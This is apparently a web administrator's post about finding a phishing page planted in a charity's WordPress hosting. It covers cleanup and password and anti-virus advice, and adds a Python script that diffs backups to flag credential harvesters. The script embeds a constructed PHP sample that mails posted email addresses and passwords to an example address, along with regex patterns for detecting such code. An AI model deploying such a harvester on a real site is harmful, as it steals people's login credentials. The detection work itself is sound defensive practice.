I routinely go through all sites four times a year; depending on how active you are on your site, it might be more frequently than that.
While downloading the backup files from one site, my anti-virus scanner stopped me from downloading one of the files. It had detected something in the file.
I turned my AV off (not recommended) so I could download the file and examine it. What I found was a phishing trojan on this website. It had been added to the site and was not present in an earlier backup I had taken 3 months ago.
The question was, how did it get there?
Getting back on line
The first problem, though, was to back up the site, clean out the hosting, put fresh code onto the site and restore only the content part of the website; then change all of the passwords and force any logged-in users to log out and reset their security. It took around 7 hours to find out what it was, how it worked, and then to explore the various ways it may have got there. I naturally have to assume that my own systems may have been compromised too, so I have to reset all of those and review security, so the whole thing is a massive pain. I also routinely raise it with the hosting company.
Returning to the question
The WordPress website itself was not hacked in this case. There was no evidence of any of the files having been edited, although I did discard everything and rebuild the site. The hosting was compromised: someone had placed some files into the hosting.
They appeared to be totally isolated, meaning that it was unclear how someone on the legitimate site could end up at this single page. I am speculating that the page was referenced from other sites. The hacker in this case presented a screen inviting the victim to enter their email address and password to download a file. When the victim entered their email address and password, this, along with other information, was emailed to the hackers, who used anonymous Gmail accounts. The page used the hosting to display itself and to send the email to the two Gmail addresses. This is called phishing and is a form of identity theft.
We are still unclear how it got there; however, the most likely way was through a hacked email account. The control panel details were sent to this organisation some time ago. If those details sat in the email box, and if that email box was online, then it is conceivable that someone could read them and use them.
It was later confirmed that the administrator's email account was hacked in November. If this happens to you, do let me know immediately. I can reset some parameters on the website very quickly; it may save me hours if something does go wrong!
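The file was found because it was not in the earlier backup, and it behaved as described above (a posted password handed to mail()). The following script is an added example, not code from the original post: it compares the digests of a current hosting export against those of the last clean backup, then flags any new or changed script that matches that pattern for a human to review. The sample file contents are constructed stand-ins, not the actual files from this incident.

```python
import hashlib
import os
import re

# Constructed samples: a tiny stand-in for the kind of page described above
# (not the real file from the incident) and a harmless plugin-style file.
SAMPLE_HARVESTER = (
    "<?php if ($_POST) { mail('someone@example.com', 'login', "
    "$_POST['email'] . ':' . $_POST['password']); } ?>"
    "<form method='post'><input name='email'><input name='password'></form>"
)
SAMPLE_WP_FILE = "<?php /* Plugin Name: Example */ add_action('init', 'example_init'); ?>"

def hash_tree(root):
    """Map each file under root (relative path) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests

def diff_trees(old, new):
    """Compare two {path: digest} maps: files added, changed and removed since the backup."""
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    changed = sorted(p for p in new if p in old and new[p] != old[p])
    return {"added": added, "changed": changed, "removed": removed}

# Heuristic for the pattern in the post: a script that reads a posted password
# and passes something to mail(). A hit means "review this file", not "proven malicious".
_MAIL_CALL = re.compile(r"\bmail\s*\(")
_POSTED_SECRET = re.compile(r"\$_(?:POST|REQUEST)\[\s*['\"](?:pass(?:word|wd)?|pwd)['\"]\s*\]", re.I)

def looks_like_credential_harvester(source):
    return bool(_MAIL_CALL.search(source) and _POSTED_SECRET.search(source))

def review_added_files(root, old_digests):
    """Return the added/changed files under root that match the harvester heuristic."""
    delta = diff_trees(old_digests, hash_tree(root))
    flagged = []
    for rel in delta["added"] + delta["changed"]:
        with open(os.path.join(root, rel), "r", errors="replace") as fh:
            if looks_like_credential_harvester(fh.read()):
                flagged.append(rel)
    return flagged
```

Run hash_tree over the last clean backup and keep the result; after the next download, call review_added_files on the new export with those saved digests, and read anything it lists before assuming the site is clean.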
Security of information
If you are using a public free email provider such as Hotmail, Yahoo or Gmail, please do not leave anything sensitive in your email folders if they are online.
Also consider turning on additional methods of authentication to prevent your email account from being hijacked.
Keep it tough!
People share passwords with me from time to time so that I can access accounts on their behalf, and invariably the passwords are very simple. The ones I give to you are very complex. If you are sent password details by email then you need to consider the following points:
- Remove the mail from your email system: store the information independently in a file and delete the email.
- Do not leave it in an online (web accessible) email account.
- Consider changing the password to something else, but keep it complex, do not simplify it.
- If you have shared your account details with me (for example for the purposes of moving a site), then when I tell you I have completed the move change the password immediately. You need to remain in control at all times.
- If you have shared the cPanel account details with your “IT Partners” because they were setting up email accounts for you, change the password to something else when they have finished working on the site. You need to remain in control at all times.
I raised some questions about anti-virus protection at this charity. It turns out that they were using free anti-virus programs. I do not recommend taking short cuts with security. I have now had to deal with around 5 cases where a good-quality anti-virus program might have prevented something from being downloaded and installed on a computer. You can get large discounts from providers such as Eset.com if you are a registered charity. These programs not only check for viruses but also provide a firewall around your computer.
It is also worth noting in this case that my AV detected this file inside a zipped-up download. The file was harmless provided it was not sitting on a web server. I use ESET Smart Security, and have done so for 15 years for this reason.
Trust me, I am a doctor
I also got into a protracted debate over email with a representative of the IT company for this charity. I will not go into the details here; however, if you are using an external company to look after your systems, as was the case here, it is worth asking why a free anti-virus program was being used or recommended.
The attitude of this individual was very defensive, claiming a large number of other ways that this may have happened, all of which are well documented and covered on your sites from day one. He failed to register the point that a problem had occurred and that the most important thing was to prevent it from happening again.
If you have placed the management of your IT into someone else’s hands, do check that you have adequate protection. I have seen an increasing number of cases where PCs have not been protected, and trojans and other malware have been accidentally downloaded and installed on a computer. It is not the fault of the user; these things are increasingly devious in how they get onto computers.
There are examples where a PC has been compromised in a small business and, over a weekend, their entire systems were erased (because it was a supervisor's PC). On the Monday morning the office came in to find that a ransom note had appeared on the screen asking them to ring a mobile phone number if they wanted to get their data back.
Don’t let this happen to you.